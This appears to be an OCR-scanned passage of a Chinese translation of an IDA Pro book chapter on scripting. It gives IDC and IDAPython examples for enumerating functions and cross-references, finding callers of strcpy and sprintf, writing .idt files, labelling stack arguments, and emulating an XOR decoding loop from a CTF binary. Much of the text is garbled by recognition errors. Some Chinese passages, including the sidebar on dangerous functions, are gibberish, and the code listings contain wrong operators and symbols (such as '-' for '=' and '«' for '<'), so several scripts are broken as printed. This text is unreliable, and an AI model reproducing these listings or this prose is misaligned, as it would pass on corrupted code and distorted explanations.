à inst - FindCode(inst, SEARCH DOWN | SEARCH NEXT); 








Warning("Xs contains ^d instructionsNn", Name(func), count); 
} 
else { 
Warning("No function found at location Xx", ScreenEA()); 
} 
} 


这 个 函数 从 @ 处 开始 ， 它 使 用 GetFunctionAttr 确定 包含 光标 地 址 (ScreenEA() ) 的 函数 的 
起 始 地 址 。 如 果 确 定 了 一 个 函数 的 起 始 地 址 ， 下 一 步 @@ 是 再 次 使 用 GetFunctionAttr fff xE 12 PRI 
的 结束 地 址 。 确 定 该 也 数 的 边界 后 ， 接 下 来 执行 一 个 循环 ,使 用 FindCode rRZK ( 69 ) 的 搜索 功 
能 ， 逐 个 识别 函数 中 的 每 一 条 指令 。 在 这 个 例子 中 ，Warning 也 数 用 于 显示 结果 ， 因 为 这 个 函数 
仅仅 生成 一 行 输出 , 而 在 警告 对 话 框 中 显示 输出 , 要 比 在 消息 窗口 中 显示 输出 更 加 明显 。 请 注意 ， 
这 个 例子 假定 给 定 函 数 中 的 所 有 指令 都 是 相 邻 的 。 另 一 种 方法 可 以 替代 FindCode 来 遍历 函数 中 
每 条 指令 的 所 有 代码 交叉 引用 。 只 要 编写 适当 的 脚本 , 你 就 可 以 采用 这 种 方法 来 处 理 非 相 邻 的 活 
数 CERRI “ITIR” BRANO). 























15.5.3” 枚 举 交 义 引 用 


由 于 可 用 于 访问 交叉 引用 数据 的 函数 的 数量 众多 ,以 及 代码 交 又 引用 的 双 疝 性 ， 如何 遍历 交 
叉 引 用 可 能 会 令 人 困惑 。 为 了 获得 你 想 要 的 数据 ,你 必须 确保 自己 访问 的 是 适合 当前 情况 的 正确 
交叉 引用 类 型 。 在 我 们 的 第 一 个 交叉 引用 示例 (如 代码 清单 15-3 所 示 ) 中 ， 我 们 遍历 函数 中 的 
条 指令 ,确定 这 些 指 令 是 否 调用 了 其 他 因数 ， 从 而 获得 该 国 数 所 做 的 全 部 男 数 调用 。 要 完成 
这 个 任务 ， 一 个 方法 是 解析 GetMnem 的 结果 ， 从 中 查找 call 指令 。 但 是 ， 这 种 方法 并 不 是 非常 
方便 ， 因 为 用 于 调用 函数 的 指令 因 CPU 类 型 而 异 。 此 外 ， 要 确定 到 底 是 哪 一 个 函数 被 调用 ， 你 
还 需要 进行 额外 的 解析 。 使 用 交叉 引用 则 可 以 免 去 这 些 麻 烦 ， 因 为 它们 独立 于 CPU， 能 够 直接 



































15.5 IDC 脚本 示例 213 








告诉 我 们 交叉 引用 的 目标 。 
代码 清单 15-3” 枚 举 函 数 调用 


#include «idc.idc» 
static main() { 
auto func, end, target, inst, name, flags, xref; 
flags - SEARCH DOWN | SEARCH NEXT; 
func = GetFunctionAttr(ScreenEA(), FUNCATTR START); 
if (func != -1) ( 
name - Name(func); 
end = GetFunctionAttr(func, FUNCATTR END); 
for (inst = func; inst « end; inst = FindCode(inst, flags)) { 
for (target = Rfirst(inst); target !- BADADDR; target = Rnext(inst, target)) { 
xref - XrefType(); 
if (xref -- fl CN || xref == fl CF) { 
Message("%s calls Ze from Ox%x\n", name, Name(target), inst); 
} 
} 
} 
} 


else { 
Warning("No function found at location Xx", ScreenEA()); 


} 

在 这 个 例子 中 ， 必 须 遍 历 孔 数 中 的 每 条 指令 。 然 后 ， 对 于 每 一 条 指令 ， 我们 必须 遍历 从 
它们 发 出 的 每 一 个 交 又 引用 。 我 们 仪 仅 对 调用 其 他 也 数 的 交叉 引用 感 兴 趣 ， 因 此 ， 我 们 必须 
检查 XrefType 的 返回 值 ， 从 中 查找 f1 CN 或 fl CF 类 型 的 交叉 引用 。 同 样 ， 这 个 特殊 的 解决 
方案 只 能 处 理 包 含 相 邻 指令 的 函数 。 由 于 这 上 段 脚 本 已 经 裔 历 了 每 条 指令 的 交叉 引用 ， 因 此 我 
们 不 需要 进行 太 大 的 更 改 ， 就 可 以 使 用 这 上段 脚本 进行 基于 流程 的 分 析 ， 而 不 是 上 面 的 基于 地 
址 的 分 析 。 

男 外 ,交叉 引用 还 可 用 于 确定 引用 某 个 位 置 的 每 一 个 位 置 。 例如， 如 果 和 希望 创建 一 个 低 成 本 
的 安全 分 析 器 ， 我 们 可 能 会 有 兴趣 监视 对 strcpy 和 sprintf 等 函数 的 所 有 调用 。 
































危险 函数 
O O Oe CDI. Seen? E] Spence CIE B JB. BIET B BUB B. BE BIB TB BBC BS IB IEEE IB 
EL BEI E IEEE E OD DIOE EL HOA DELE B Be EB EL T BED BE EET EHE HIE OI 
OHIMCTOPDODOOIDC OK BIDUO LEE HO E OBI E a BEBE BE JB 0 A E BI IET EHI 
strepy LH UU DB EL BEL OL BLU : 


char *strcpy(char *dest, const char *source); 


strepy Li E BLU DL BL OE EL OLO DE OLG CELO COE COLD OE CE 7L OL UTE O 7L OEC CEUTCECEUE EI 
EHE ELE IBI B LEE IEEE IH eres OD BCLLO UBI BE B. B: BEES BED BE HL. B BO D ICI 
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中国 
OHIO E I. DOP D HEED DEI H e E o OO OU 


在 下 面 的 例子 中 ， 如 代码 清单 15-4 所 示 ， 我 们 逆向 遍历 对 菏 个 符号 (相对 于 前 一 个 例子 中 
的 “发 出 引用 ”) 的 所 有 交叉 引用 。 


代码 清单 15-4” 枚 举 一 个 函数 的 调用 方 
#include «idc.idc» 
static list callers(bad func) { 
auto func, addr, xref, source; 
o func = LocByName(bad func); 
if (func -- BADADDR) { 
Warning("Sorry, ^s not found in database", bad func); 
) 
else { 
for (addr = RfirstB(func); addr !- BADADDR; addr = RnextB(func, addr)) { 
xref - XrefType(); 
if (xref == fl CN || xref == fl CF) { 
source = GetFunctionName(addr); 
Message("Xs is called from OxXx in Zen, bad func, addr, source); 


GK 


j 
j 


static main() { 
list callers(" strcpy"); 
list callers(" sprintf"); 
J 
EASP EF, LocByName 0 KAHERA E (Er ) 非法 函数 的 地 址 。 如 采 发 现 
这 个 函数 的 地 址 ， 则 执行 一 个 循环 @ ， 处 理 对 这 个 非法 函数 的 所有 交叉 引用 。 对 于 每 一 个 交叉 引 
用 ， 如 采 确 定 了 交叉 引用 类 型 目 为 调用 类 型 @， 则 确定 实施 调用 的 函数 的 名 称 晶 ， 并 回 用 户 显示 
这 个 名 称 @。 
需要 注意 的 是 ， 要 正确 确定 一 个 导入 函数 的 名 称 ， 你 可 能 需要 做 出 一 些 修改 。 有 具体 来 说 ， 
在 ELF 可 执行 文件 中 [这 种 文件 结合 一 个 过 程 链 接 表 (了 PLT ) 和 一 个 全 局 偏 移 量 表 (GOT ) 来 
处 理 共享 库 链 接 |, IDA 分 配给 导入 函数 的 名 称 可 能 并 不 十 分 明确 。 例 如 ， 一 个 PLT 条 目 似乎 
名 为 _memcpy， 但 实际 上 它 叫 做 .memcpy; IDA 用 下 划 线 替换 了 点 ， 因 为 在 IDA 名 称 中 ， 点 属于 
无 效 字 符 。 使 问题 更 加 复杂 的 是 ，IDA 可 能 只 是 创建 了 一 个 名 为 memcpy 的 符号 ， 该 符号 位 于 
一 个 IDA 称 为 extern 的 节 内 。 在 尝试 枚 举 对 memcpy 的 交叉 引用 时 ,我们 会 对 这 个 符号 的 PLT 
版 本 感 兴趣 ， 因 为 它 是 程序 中 其 他 卫 数 调用 的 版 本 ， 因 此 也 是 所 有 交 又 引用 引用 的 版 本 。 


15.5.4 ” 枚 举 导 出 的 函数 
在 第 13 章 中 ， 我 们 讨论 了 使 用 idsutils 生成 描述 共享 库 内 容 的 .ids 文件 。 我 们 提 到 ， 第 一 
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步 是 生成 一 个 .idt 文件 ， 它 是 包含 库 中 每 个 导出 函数 的 描述 信息 的 文本 文件 。IDC RU" He 
数 ， 用 于 遍历 共享 库 导出 的 函数 。 下 面 的 脚本 如 代码 清单 15-5 所 示 ， 可 在 IDA 打开 一 个 共享 库 
后 生成 一 个 .idt 文件 。 


代码 清单 15-5 "En dr 文件 的 脚本 
itinclude «idc.idc» 
static main() { 
auto entryPoints, i, ord, addr, name, purged, file, fd; 
file - AskFile(1, "*.idt", "Select IDT save file"); 
fd = fopen(file, "w"); 
entryPoints - GetEntryPointOty(); 
fprintf(fd, "ALIGNMENT 4n"); 
fprintf(fd, "o Name=%s\n", GetInputFile()); 
for (i = 0; i < entryPoints; i++) { 
ord = GetEntryOrdinal(i); 
if (ord -- 0) continue; 
addr = GetEntryPoint(ord); 
if (ord -- addr) ( 
continue; //entry point has no ordinal 








name - Name(addr); 
fprintf(fd, "Xd Name=%s", ord, name); 
purged = GetFunctionAttr(addr, FUNCATTR ARGSIZE); 
if (purged > 0) ( 
fprintf(fd, " Pascal-^d", purged); 
J 
fprintf(fd, "An" 55 
J 
} 


这 个 脚本 的 输出 保存 在 用 户 指 定 的 文件 中 。 这 段 脚 本 引入 的 新 函数 包括 GetEntryPointQty， 
它 返 回 库 导 出 的 符号 的 数量 ; GenEntry0rdinal ， 它 返回 一 个 序号 ( 库 的 导出 表 的 索引 ); 
GetEntryPoint， 它 返回 与 一 个 导出 函数 关联 的 地 址 (该 函数 通过 序号 标识 ); GetInputFile， 它 
返回 加 载 到 IDA 中 的 文件 的 名 称 。 


15.5.5 “查找 和 标记 函数 参数 


调用 一 个 函数 之 前 ,在 x86 二 进 制 文件 中 ,3.4 之 后 的 GCC 版 本 一 直 使 用 mov 语句 ( 而 非 push 
语句 ) 将 另 数 参数 压 和 人 栈 上 。 由 于 IDA 的 分 析 引 擎 依靠 查找 push 语句 来 确定 函数 调用 中 压 入 也 
数 参数 的 位 置 ， 这 给 IDA 的 分 析 造 成 了 一 些 困难 (IDA 的 更 新 版 本 可 以 更 好 地 处 理 这 种 情况 )。 
下 面 显示 的 是 向 栈 压 人 参数 时 的 IDA 反 汇 编 代码 清单 : 

















.text:08048894 push 0 ; protocol 
. text :08048896 push 1 ; type 
. text :08048898 push 2 ; domain 


. text :0804889A call | Socket 
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请 注意 每 个 反 汇 编 行 右 侧 的 注释 。 只 有 在 IDA 认识 到 参数 正 被 压 人 ， 且 IDA 知道 被 调用 吻 
数 的 签名 时 ， 这 些 注释 才 会 显示 。 如 果 使 用 mov 语句 将 参数 压 人 栈 中 ,得 到 的 反 汇 编 代 码 清单 提 
供 的 信息 会 更 少 ， 如 下 所 示 : 








. text:080487AD mov [esp«8], O 
. text :080487B5 mov [esp+4], 1 
. text :080487BD mov [esp], 2 

. text :080487C4 call Socket 


可 见 , IDA 并 没有 认识 到 , 在 函数 被 调用 之 前 , 有 3 个 mov 语句 被 用 于 为 函数 调用 设置 参数 。 
此 ，IDA 无 法 在 反 汇 编 代码 清单 中 以 自动 注释 的 形式 为 我 们 提供 更 多 信息 。 

在 下 面 这 种 情形 中 , 我 们 使 用 一 个 脚本 恢复 我 们 经 常 在 反 汇 编 代码 消 单 中 看 到 的 信息 。 代码 
清单 15-6 中 的 脚本 努力 自动 识别 为 函数 调用 设置 参数 的 指令 。 











代码 清单 15-6 ”参数 自动 识别 
#include «idc.idc» 
static main() { 
auto addr, op, end, idx; 
auto func flags, type, val, search: 
search = SEARCH DOWN | SEARCH NEXT; 
addr = GetFunctionAttr(ScreenEA(), FUNCATTR START); 
func flags = GetFunctionFlags(addr); 
if (func flags & FUNC FRAME) (  //Is this an ebp-based frame? 
end = GetFunctionAttr(addr, FUNCATTR END); 
for (; addr < end && addr !- BADADDR; addr = FindCode(addr, search)) { 
type = GetOpType(addr, oi: 
if (type == 3) { //Is this a register indirect operand? 
if (GetOperandValue(addr, 0) == 4) { //Is the register esp? 
MakeComm(addr, "arg 0"); //[esp] equates to arg 0 
} 
} 
else if (type == 4) { //Is this a register + displacement operand? 
idx = strstr(GetOpnd(addr, 0), "[esp"); //Is the register esp? 
if (idx !- -1) ( 
val = GetOperandValue(addr, 0);  //get the displacement 
MakeComm(addr, form("arg Ad", val)); //add a comment 


这 个 脚本 仅 针 对 基于 EBP 的 帧 ， 并 依赖 于 此 : 在 函数 被 调用 之 前 ， 当 参数 被 压 人 栈 中 时 ， 
GCC 会 生成 与 esp 相应 的 内 存 引 用 。 该 脚本 遍历 函数 中 的 所 有 指令 。 对 于 每 一 条 使 用 esp 作为 基 
址 寄存 融 癌 内 存 位 置 写 人 数据 的 指令 , 该 脚本 确定 上 述 内 存 位 置 在 栈 中 的 次 度 , 并 添加 一 条 注释 ， 
指出 被 压 和 人 的 是 哪 一 个 参数 。GetFunctionF1ags 函数 提供 了 与 函数 关联 的 各 种 标志 ， 如 该 函数 是 

















15.5 IDC 脚本 示例 217 


否 使 用 一 个 基于 EBP 的 栈 帧 。 运 行 代码 清单 15-6 中 的 脚本 ， 将 得 到 一 个 包含 注释 的 反 汇 编 代码 
清单 ， 如 下 所 示 : 





.text:080487AD mov [esp+8], O ; arg 8 
. text :080487B5 mov [espr4], 1 ; arg 4 
. text :080487BD mov [esp], 2 ; arg O 

. text :080487C4 call |. Socket 








这 里 的 注释 并 没有 提供 特别 有 用 的 信息 。 但 是 , ME, 我 们 可 以 一 眼看 出 ,程序 使 用 了 3 个 
mov 语句 在 栈 上 压 人 参数 ， 这 使 我 们 戎 正确 的 方 癌 又 迈进 了 一 步 。 进 一 步 扩充 上 述 脚 本 ， 并 利用 
IDC 的 其 他 一 些 功 能 , 我 们 可 以 得 到 为 一 个 脚本 , 它 提 供 的 信息 几乎 和 IDA 在 正确 识别 参数 时 提 
供 的 信息 一 样 多 。 这 个 新 脚本 的 最 终 输 出 如 下 所 示 : 














.text:080487AD mov [esp+8], O ; int protocol 
. text :080487B5 mov [espr4], 1  ; int type 

. text :080487BD mov [esp], 2 ; int domain 

. text :080487C4 call | Socket 





代码 清单 15-6 中 的 脚本 的 扩充 版 本 请 参见 与 本 书 有 关 的 网 站 *, 该 脚本 能 够 将 函数 签名 中 的 
数据 合并 到 注释 中 。 


15.5.6 ”模拟 汇编 语言 行为 


出 于 许多 原因 ， 你 可 能 需要 编写 一 段 脚 本 ,模拟 你 所 分 析 的 程序 的 行为 。 例 如 ， 你 正在 
分 析 的 程序 可 能 和 许多 恶意 程序 一 样 , 属于 自修 改 程序 , 该 程序 也 可 能 包含 一 些 在 运行 时 根 
据 需 要 解码 的 编码 数据 。 如 果 不 运 行 该 程序 , 并 从 正在 运行 的 进程 的 内 存 中 提取 出 被 修改 的 
数据 ,你 如 何 了 解 这 个 程序 的 行为 呢 ? IDC 脚本 或 许可 以 帮 你 解决 这 个 问题 。 如 果 解 码 过 程 
不 是 特别 复杂 ， 你 可 以 迅速 编写 出 一 个 IDC 脚本 ， 执 行 和 程序 运行 时 执行 的 操作 。 如 果 你 
不 知道 程序 的 作用 ,也 没有 可 供 该 程序 运行 的 平台 , 使 用 一 个 脚本 以 这 种 方式 解码 数据 ,你 
不 需 运 行程 序 即 可 获得 相关 信息 。 如 果 你 正 使 用 Windows 版 本 的 IDA 分 析 一 个 MIPS 二 进 
制 文件 ， 可 能 会 出 现 上 述 后 一 种 情况 。 没 有 任何 MIPS 硬件 ， 你 将 无 法 运行 这 个 MIPS 二 进 
制 文件 ， 观 察 它 执行 的 任何 数据 解码 任务 。 但 是 ， 你 可 以 编写 一 个 IDC 脚本 来 模拟 这 个 二 
进 制 文件 的 行为 , 并 对 IDA 数据 库 进 行 必要 的 修改 , 所 有 这 一 切 根本 不 需要 在 MIPS 执行 环 
境 中 进行 。 

下 面 的 x86 代码 摘自 DEFCON?” 的 一 个 “ 夺 旗 赛 ”” 二进制 文件 。 









































(D 参见 http:/www.idabook.com/ch15 examples. 
D 参见 http://www.defcon.org/。 
© 由 DEFCON 15 CTF 的 组 织 者 Kenshoto 提供 。“ 夺 旗 赛 ”是 DEFCON 每 年 举办 的 一 项 黑客 竞赛 。 
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.text :08049EDE mov [ebp+var 4], O 
. text: 08049EE5 
.text:08049EE5 loc 8049EE5: 


. text: 08049EE5 cmp [ebp+var 4], 3Cih 
. text : 08049EEC ja short locret 8049F0D 
. text : 08049EEE mov edx, [ebp+var 4] 
. text :08049EF1 add edx, 804B880h 

. text :08049EF7 mov eax, [ebp+var 4] 
. text : 08049EFA add eax, 804B880h 

. text :08049EFF mov al, [eax] 

. text :08049F01 XOr eax, 4Bh 

. text:08049F04 mov [edx], al 
.text:08049F06 lea eax, [ebp+var 4] 
.text:08049F09 inc dword ptr [eax] 

. text :08049F0B jmp short loc 8049EE5 


这 有 段 代码 用 于 解码 一 个 植 入 到 程序 二 进 制 文件 中 的 私 钥 。 使 用 如 代码 清单 15-7 所 示 的 IDC 
脚本 ， 不 必 运 行程 序 就 可 以 提取 出 这 个 私 钥 。 


代码 清单 15-7 ”使 用 IDC 模拟 汇编 语言 
auto var 4, edx, eax, al; 
var 4 = Dj 
while (var 4 <= Ox3C1) { 
edx = var 4; 
edx = edx + 0x804B880; 
eax - var 4j 
eax = eax + Ox804B880; 
al = Byte(eax); 
al = al ^ Ox4B; 
PatchByte(edx, al); 
var 4++; 





j 


代码 清单 15-7 只 是 对 前 面 汇 编 语言 代码 ( 根据 以 下 相当 机 械 化 的 规则 生成 ) 的 直接 转换 。 

(1) 为 汇编 代码 中 的 每 一 个 栈 变量 和 寄存 需 声 明 一 个 IDC 变量 。 

(2) 为 每 一 个 汇编 语言 语句 编写 一 个 模拟 其 行为 的 IDC 话 人 句 。 

(3) 通过 读 取 和 写 入 在 DC 脚本 中 声明 的 对 应 变量 ， 模 拟 读 取 和 写 入 栈 变量 。 

(4) 根据 被 读 取 数 据 的 数量 (1 字 节 、2 字 节 或 4 字 节 )， 使 用 Byte, Word 或 Dword 函数 从 一 
个 非 栈 位 置 读 取 数据 。 

(5) 根据 被 写 人 数据 的 数量 ,使 用 PatchByte, PatchWord 或 PatchDword 函数 向 一 个 非 栈 位 置 
写 人 数据 。 

(6) 通 第 ， 如 果 代 码 中 包含 一 个 终止 条 件 不 十 分 明确 的 循环 ， 那 么 ,模拟 程序 行为 的 最 简单 
方法 是 首先 使 用 一 个 无 限 循 环 ( 如 while(1) {} ), 然后 在 遇 到 使 循环 终止 的 语句 时 插入 一 个 break 


语句 。 
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CT) "un ds S] FH BP, RISUS 13 SRL 2 "D T ERRECART, TRAMA 
设法 模拟 被 调用 的 函数 的 行为 , 包括 提供 一 个 被 模拟 的 代码 的 上 下 文 认可 的 返回 值 。 仅 仅 这 个 事 
实 可 能 就 使 得 你 无 法 使 用 IDC 来 模拟 汇编 语言 程序 的 行为 。 

在 编写 和 上 面 的 脚本 类 似 的 脚本 时 ,需要 注意 的 是 ， 有 时 候 , 你 并 不 一 定 非 要 从 整体 上 完全 
了 解 你 所 模拟 的 代码 的 行为 。 通常 ,一 次 理解 一 两 条 指令 ,并 将 这 些 指 令 正 确 转 换 成 对 应 的 IDC 
脚本 就 足够 了 。 如 果 每 一 条 指令 都 正确 转换 成 IDC 脚本 ， 那 么 ， 整 个 脚本 将 能 够 正确 模拟 最 初 
的 汇编 代码 的 全 部 功能 。 我 们 可 以 推迟 分 析 汇 编 语言 算法 ， 直 到 IDC 脚本 编写 完成 ， 到 那 时 ， 
我 们 就 可 以 利用 IDC 脚本 深化 对 基本 汇编 代码 的 理解 。 了 解 上 面 示例 中 算法 的 工作 机 制 后 ， 我 
们 可 以 将 那个 IDC 脚本 缩短 成 下 面 的 脚本 : 





























auto var 4, addr; 

for (var 4 = 0; var 4 <= Ox3C1; var 4++) { 
addr = Ox804B880 + var 4; 
PatchByte(addr, Byte(addr) ^ Ox4B); 

j 


为 外 ， 如 采 不 希望 以 任何 方式 修改 数据 库 ， 在 处 理 ASCH 数据 时 ,我 们 可 以 用 Message PRX 
(REF PatchByte 函数 ， 或 者 在 处 理 二 进 制 数据 时 ， 将 数据 写 入 到 一 个 文件 中 。 


15.6 IDAPython 


IDAPython 是 由 Gergely Erdelyi 开发 的 一 种 插件 ， 它 在 IDA 中 集成 了 Python Wo ri 
供 Python 的 功能 外 ,使 用 这 个 插件 还 可 以 编写 出 能 够 实现 IDC 脚本 语言 所 有 功能 的 Python 脚本 。 
IDAPython 的 一 个 显著 优势 在 于 ， 它 可 以 访问 Python 的 数据 处 理 功能 以 及 所 有 Python 模块 。 此 
外 ，IDAPython 还 具有 IDA SDK 的 大 部 分 功能 ， 与 使 用 IDC 相 比 ， 使 用 它 可 以 编写 出 功能 更 加 
强大 的 脚本 。 在 IDA 社区 中 ，IDAPython 拥有 众多 支持 者 。Ilfak 的 博客 "中 包括 大 量 使 用 Python 
脚本 解决 的 有 趣 问题 ， 同 时 相关 问题 、 管 案 和 许多 其 他 有 用 的 IDAPython 脚本 也 经 常 发 布 在 
OpenRCE.org 论坛 > 中 ,此 外 ,一 些 第 三 方 工具 ( 如 Zynamics 的 BinNavi? 地 依靠 IDA 和 IDAPython 
执行 各 种 所 需 的 子 任务 。 

从 IDA 5.4 以 来 ，Hex-Rays 一 和 耳 将 IDAPython 作为 IDA 的 标准 插件 。 该 插件 的 源 代 码 可 从 
IDA-Python 的 项 目 页 面 下 载 "， 而 API 文 档 则 位 于 Hex-Rays 网 站 ?上 。 只 有 在 运行 IDA 的 计算 机 
安装 了 Python 的 情况 下 ，IDA 才 会 启用 该 搬 件 。Windows 版 本 的 IDA 附带 并 安装 有 兼容 版 本 的 
Python"， 而 Linux 和 OS X 版 本 的 IDA 需要 你 自行 安装 Python, TE Linux 中 ， 当 前 版 本 的 IDA 

















(D 参见 http:/www.hexblog.com。 

(2) 参见 http://www.openrce.org/articles/。 

(3) 参见 http://www.zynamics.com/binnavi.html。 

(4) 参见 http://code.google.com/p/idapython/。 

(5) 参见 http:/www.hex-rays.com/idapro/idapython docs/index.html。 
© 参见 http://www.python.org/。 
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(6.1) 使 用 的 是 Python 2.6。IDAPython 与 Python 2.7 兼容 ， 如 果 创 建 由 所 需 的 Python 2.6 库 指向 
你 现 有 的 Python 2.7 库 的 符号 链接 ，IDA 将 正常 运行 。 如 果 你 拥有 Python 2.7， 使 用 与 下 面 类 似 
的 命令 可 创建 IDA 所 需 的 符号 链接 : 








# ln -s /usr/lib/libpython2.7.s0.1.0 /usr/lib/libpython2.6.s0.1 


OS X 用 户 可 能 会 发 现 ，OS X 附带 的 Python 版 本 要 低 于 IDA 所 需 的 版 本 。 如 采 出 现 这 种 情 
况 ， 则 需要 从 www.python.org 下 载 适 当 的 Python 安装 程序 ”。 





使 用 IDAPython 


IDAPython 通过 3 个 Python 模块 ( 每 个 模块 服务 于 特定 的 用 途 ) 将 Python 代码 注入 到 IDA 中 。 
idaapi 模块 负责 访问 核心 IDAAPI 如 通过 SDK 揭示 的 那样 ),IDAPython 的 idc 模块 负责 提供 IDC 
中 的 所 有 也 数 功 能 。IDAPython 附 市 的 第 三 个 模块 为 idautils， 它 提供 大 量 实用 丽 数 ， 其 中 许多 
男 数 可 生成 各 种 数据 库 相 关 对 象 ( 如 上 困 数 或 交叉 引用 ) 的 Python 列表 。 所 有 IDAPython 脚本 会 目 
动 导 入 idc 和 idautils 模块 。 另 一 方面 ， 如 果 你 需要 idaapi 模块 ， 你 必须 自己 导入 该 模块 。 

在 使 用 IDAPython 时 ， 请 记 住 该 插件 将 一 个 Python 解释 需 实 例 衣 人 到 IDA 中 。 在 关闭 IDA 
之 前 ， 该 解释 需 将 正 党 运行。 因此， 你 可 以 查看 所 有 脚本 和 语句 ， 就 好 像 它 们 在 Python shell 会 
话 中 运行 一 样 。 例 如 , 在 IDA 会 话 中 首次 导入 idaapi 模块 后 ， 在 重新 启动 IDA 之 前 ， 你 根本 不 
需要 再 次 导入 该 模块 。 同样 , 已 初始 化 的 变量 和 函数 定义 将 保留 它们 的 值 ， 直 到 被 重新 定义 ,或 
直到 你 退出 IDA。 

有 大 量 方法 可 帮助 你 学 习 IDA 的 Python API。 如 果 你 在 使 用 IDC 或 使 用 IDA SDK 编程 方面 
已 经 具有 一 些 经 验 ， 那 么 你 应 该 相当 熟悉 idaapi 5j idc 模块 。 在 这 种 情况 下 ， 在 开始 充分 利用 
IDAPython 之 前 ， 你 只 需要 简单 回顾 idautils 模块 的 其 他 功能 。 如 果 之 前 有 过 使 用 IDC 或 SDK 
的 经 验 ， 那么 你 可 以 研究 Hex-Ray 有 关 Python API 的 文档 ， 深 入 了 解 它 的 功能 。 请 记 住 ，idc 模 
块 基本 上 是 IDC API 的 写照 , 因此 , 你 会 发 现 , IDA 内 置 帮 助 文档 中 的 IDC 函数 列表 将 非常 有 用 。 
同样 ， 本 章 前 面 的 IDC 函数 说 明 也 适用 于 idc 模块 中 的 对 应 函数 。 




















15.7 IDAPython 脚本 示例 


为 将 IDC 5 IDAPython 进行 比较 ， 在 下 面 几 节 中 ， 我 们 将 提供 与 前 面 讨论 IDC 时 相同 的 示 
例 。 我 们 尽 可 能 充分 利用 特定 于 Python 的 功能 ， 以 在 一 定 程度 上 说 明 以 Python 编写 脚本 所 市 来 
的 效率 。 


15.7.1 枚 举 函 数 
IDAPython 的 一 个 主要 优点 在 于 , 它 使 用 Python 的 强大 数据 类 型 来 简化 对 数据 库 对 象 集合 的 








(D 参见 http://www.python.org/download/mac/。 


15.7 IDAPython 脚本 示例 221 


访问 。 在 代码 清单 15-8 中 ， 我 们 以 Python 重新 实现 了 代码 清单 15-1 列 出 的 函数 枚 举 脚本 。 回 想 
一 下 ， 这 段 脚 本 的 目的 在 于 人 吉 历 数据 库 中 的 每 一 个 函数 ， 并 打印 出 与 每 个 函数 有 天 的 基本 信息 ， 
包括 函数 的 起 始 和 结束 地 址 、 函 数 参数 的 大 小 、 函 数 的 局 部 变量 空间 的 大 小 。 所 有 输出 全 部 在 消 
县 窗口 中 显示 。 











代码 清单 15-8 使 用 Python 枚 举 函数 

funcs = Functions()69 

for f in funcs: 9 
name - Name(f) 
end = GetFunctionAttr(f, FUNCATTR END) 
locals - GetFunctionAttr(f, FUNCATTR FRSIZE) 
frame - GetFrame(f) # retrieve a handle to the function?'s stack frame 
if frame is None: continue 
ret = GetMemberOffset(frame, " r") # " r" is the name of the return address 
if ret == -1: continue 
firstArg = ret + 4 
args - GetStrucSize(frame) - firstArg 
Message("Function: Xs, starts at Xx, ends at %x\n" % (name, f, end)) 
Message(" Local variable area is Xd bytes Wn" % locals) 
Message(" ` Arguments occupy Xd bytes (d args)Wn" % (args, args / 4)) 





在 这 段 特 殊 的 脚本 中 ， 使 用 Python | 除了 用 到 有 助 于 执行 @ 人 处 for 循环 的 Functions (O) 7i 
表 生 成 套 外 ， 并 没有 为 我 们 提高 多 大 效率 。 








15.7.2 MHS 


代码 清单 13-9 说 明 如 何 利用 idautils E Hr rt RIPE oss LÀ Python 编写 代码 清单 15-2 列 出 
的 指令 计数 脚本 。 


代码 清单 15-9 使 用 Python 枚 举 指令 
from idaapi import * 
func = get func(here())69 # here() is synonymous with ScreenEA() 
if not func is None: 
fname - Name(func.startEA) 
count = 0 
for i in FuncItems(func.startEA) O: count = count + 1 
Warning("Xs contains ^d instructionsNn" % (fname,count)) 
else: 
Warning("No function found at location 4x" % here()) 


与 IDC 版 本 的 不 同 包括 使 用 SDK 函数 eo 通过 idaapi 访问 ) 来 检索 对 函数 对 象 (具体 为 
func t) 的 引用 ,并 使 用 FuncItems 生成 器 (四 ， 取 自 idautils ) 以 便于 遍历 函数 内 的 所 有 指令 。 
由 于 我 们 无 法 在 生成 句 上 使 用 Python 的 len 函数 ， 因 此 我 们 仍然 需要 检索 生成 需 列 表 ， 以 逐个 
计算 每 一 条 指令 。 
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15.7.3 枚 举 交 义 引 用 


idautils 模块 包含 几 个 生成 大 函数 ,使 用 它们 可 以 生成 比 我 们 在 IDC 中 看 到 的 列表 更 直观 的 
交叉 引用 列表 。 代 码 清单 15-10 重 写 了 我 们 之 前 在 代码 清单 15-3 中 看 到 的 函数 调用 枚 举 脚本 。 


代码 清单 15-10 ”使 用 Python PAS eK cJ] Hj 

from idaapi import * 
func = get func(here()) 
if not func is None: 

fname - Name(func.startEA) 

items - FuncItems(func.startEA) 

for i in items: 

for xref in XrefsFrom(i, 0):©@ 
if xref.type == fl CN or xreT.type == fl CF: 


Message("%s calls Ze from ox%x\n" % (fname, Name(xref.to), i)) 
else: 


Warning("No function found at location %x" % here()) 


这 段 脚 本 的 新 内 容 是 使 用 XrefsFrom 生成 器 (0, RA idautils ) 从 当前 指令 中 检索 所 有 
交叉 引用 。xrefsFrom 将 返回 对 xrefblk t WZ (其 中 包含 有 关 当 前 交叉 引用 的 详细 信息 BJ 
| 用。 


15.7.4 d& 3$ 5H BER ZA 





代码 清单 15-11 是 代码 清单 15-5 中 .idt 生成 器 脚本 的 Python 版 本 。 


代码 清单 15-11 生成 IDT 文 件 的 Python 脚本 


file = AskFile(1, "*.idt", "Select IDT save file") 
with open(file, 'w') as fd: 
fd.write("ALIGNMENT 4n") 
fd.write("0 Name-XsNn" % GetInputFile()) 
for i in range(GetEntryPointOty()): 
ord = GetEntryOrdinal(i) 
if ord == 0: continue 
addr = GetEntryPoint(ord) 
if ord == addr: continue #entry point has no ordinal 
fd.write("%d Name=%s" % (ord, Name(addr))) 
purged = GetFunctionAttr(addr, FUNCATTR_ARGSIZE) 
if purged > O: 
fd.write(" Pascal=%d" % purged) 
fd.write("\n") 





这 两 段 脚 本 看 起 来 非常 类 似 , 因为 IDAPython 没有 用 于 生成 和 人口 点 列表 的 生成 器 函数 , 所 以 
我 们 必须 使 用 在 代码 清单 15-5 中 使 用 的 同一 组 函数 。 不 过 ， 有 一 个 值得 我 们 注意 的 区 别 : 
IDAPython 没有 采用 IDC 的 文件 处 理 病 数 ， 而 是 使 用 了 Python 内 置 的 文件 处 理 函数 。 
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15.8 小结 


脚本 为 扩展 IDA 的 功能 提供 了 一 个 强大 的 工具 。 这 些 年 来 , 它 一 直通 过 各 种 创新 来 满足 IDA 
用 户 的 需要 。 用 户 可 以 从 Hex-Rays 网 站 及 前 IDA Palace” 的 镜像 站 点 下 载 许多 有 用 的 脚本 。IDC ns — 
